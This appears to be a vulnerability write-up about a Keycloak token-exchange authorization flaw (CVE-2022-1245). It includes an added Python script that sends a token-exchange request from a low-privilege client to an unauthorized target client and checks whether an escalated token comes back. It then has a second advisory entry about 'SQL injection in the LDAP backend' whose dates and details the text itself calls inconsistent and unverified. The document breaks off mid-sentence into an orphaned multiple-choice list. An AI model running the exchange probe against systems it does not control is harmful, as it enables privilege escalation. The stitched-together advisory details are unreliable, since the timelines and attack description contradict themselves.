CVE-2022-1245 A privilege escalation flaw was found in keycloak's token exchange feature. Missing authorization allows a client application to exchange tokens for any target client.

The timeline given here (reported to keycloak on 2018-02-22, fixed in release 3.0.0 on 2018-02-28) cannot apply to a CVE assigned in 2022 and should be checked against the NVD and Red Hat entries for CVE-2022-1245. What matters in practice: token exchange is a preview feature in Keycloak that has to be switched on explicitly, and when it is on, a client should only be able to exchange into a target client on which it has been granted the token-exchange permission. The flaw is that this authorization check was missing, so any client able to obtain an access token could request a token for any other client simply by naming that client as the target.
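The check a tester would run for this class of flaw, as an added example that is not code from CVE.news or the Keycloak project: build a Keycloak token-exchange request from a low-privilege client against a target client it has not been granted permission on, then judge from the response whether a token carrying the target audience came back. Keycloak's token endpoint path and the RFC 8693 parameter names (`grant_type`, `subject_token`, `subject_token_type`, `requested_token_type`, `audience`) are real; the realm, client names, secret and sample tokens are constructed. Older Keycloak deployments serve the endpoint under an `/auth` prefix, so adjust the base URL accordingly.

```python
"""Added example (not from the CVE.news page or the Keycloak project): what a
Keycloak token-exchange request looks like and how to tell, from the response,
whether the requesting client obtained a token for a target client it should
not be able to reach. Endpoint path and parameter names are Keycloak's; realm,
client names, secret and sample tokens below are constructed."""
import base64
import json
import urllib.error
import urllib.request
from urllib.parse import urlencode

TOKEN_EXCHANGE_GRANT = "urn:ietf:params:oauth:grant-type:token-exchange"
ACCESS_TOKEN_TYPE = "urn:ietf:params:oauth:token-type:access_token"


def token_endpoint(base_url: str, realm: str) -> str:
    """Keycloak's OpenID Connect token endpoint for a realm."""
    return f"{base_url.rstrip('/')}/realms/{realm}/protocol/openid-connect/token"


def build_exchange_form(client_id: str, client_secret: str,
                        subject_token: str, audience: str) -> str:
    """Form body for a token exchange; 'audience' names the target client."""
    return urlencode({
        "grant_type": TOKEN_EXCHANGE_GRANT,
        "client_id": client_id,
        "client_secret": client_secret,
        "subject_token": subject_token,
        "subject_token_type": ACCESS_TOKEN_TYPE,
        "requested_token_type": ACCESS_TOKEN_TYPE,
        "audience": audience,
    })


def exchange(base_url: str, realm: str, form: str):
    """POST the exchange and return (status, parsed JSON body); network call."""
    req = urllib.request.Request(
        token_endpoint(base_url, realm), data=form.encode(),
        headers={"Content-Type": "application/x-www-form-urlencoded"}, method="POST")
    try:
        with urllib.request.urlopen(req) as resp:
            return resp.status, json.load(resp)
    except urllib.error.HTTPError as err:
        try:
            return err.code, json.load(err)
        except ValueError:
            return err.code, {}


def decode_jwt_claims(token: str) -> dict:
    """Decode only the payload segment; no signature check, inspection not trust."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)
    return json.loads(base64.urlsafe_b64decode(payload))


def make_unsigned_jwt(claims: dict) -> str:
    """Constructed, unsigned token used only to exercise the assessment offline."""
    def seg(obj):
        return base64.urlsafe_b64encode(json.dumps(obj).encode()).decode().rstrip("=")
    return f"{seg({'alg': 'none'})}.{seg(claims)}."


def assess_exchange(status: int, body: dict, requester: str, target: str) -> str:
    """Classify the token endpoint's answer to an exchange the requester should
    NOT be permitted. 'denied' is the expected result on a patched, correctly
    configured server; 'escalated' means a token scoped to the target came back
    for this requester; anything else is 'no_target_audience'."""
    if status != 200 or "access_token" not in body:
        return "denied"
    claims = decode_jwt_claims(body["access_token"])
    aud = claims.get("aud", [])
    if isinstance(aud, str):
        aud = [aud]
    if target in aud and claims.get("azp") == requester:
        return "escalated"
    return "no_target_audience"


if __name__ == "__main__":
    # Offline walk-through with constructed values; swap in exchange() for a live test.
    requester, target = "low-priv-client", "billing-api"
    form = build_exchange_form(requester, "s3cr3t", make_unsigned_jwt({"sub": "u1"}), target)
    print(token_endpoint("https://sso.example.test", "demo"), form, sep="\n")
    leaked = make_unsigned_jwt({"aud": [target], "azp": requester, "sub": "u1"})
    print(assess_exchange(200, {"access_token": leaked}, requester, target))
    print(assess_exchange(403, {"error": "access_denied"}, requester, target))
```

Run it against a test realm only with two clients you control; an `escalated` verdict from a requester that has no token-exchange permission on the target means either an unpatched server or a permission grant that should not exist, and the two are distinguished by the Keycloak version, not by this output.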

2018-02-25: Remote code execution via SQL injection in the LDAP backend
Severity: Medium (updated; originally listed as Critical)
Credit: Khalil Shoukry
Vulnerability details: A SQL injection flaw was found in the LDAP backend of keycloak. A malicious user with database rights can inject arbitrary SQL statements into the keycloak database and cause denial of service (DoS) or remote code execution. This occurred due to insufficient validation of user input passed to the database. This issue was reported to keycloak on 2018-02-25, and was fixed in release 3.0.0 on 2018-03-01.

Note that as written the description is internally inconsistent: a user who already holds database rights needs no injection to run arbitrary SQL, and an LDAP user federation backend speaks LDAP filters rather than SQL. Treat the entry as unverified until matched to a CVE identifier.

How likely are these issues for somebody doing a web application penetration test? Keycloak is currently used by companies in many different industries, including finance, retail, and education. As such, the majority of

SQL Injection in the LDAP backend

a. SQL injection vulnerability in the LDAP backend of keycloak
b. Remote code execution vulnerability in the LDAP backend of keycloak
c. Remote code execution vulnerability that allows an anonymous attacker to inject SQL queries into keycloak
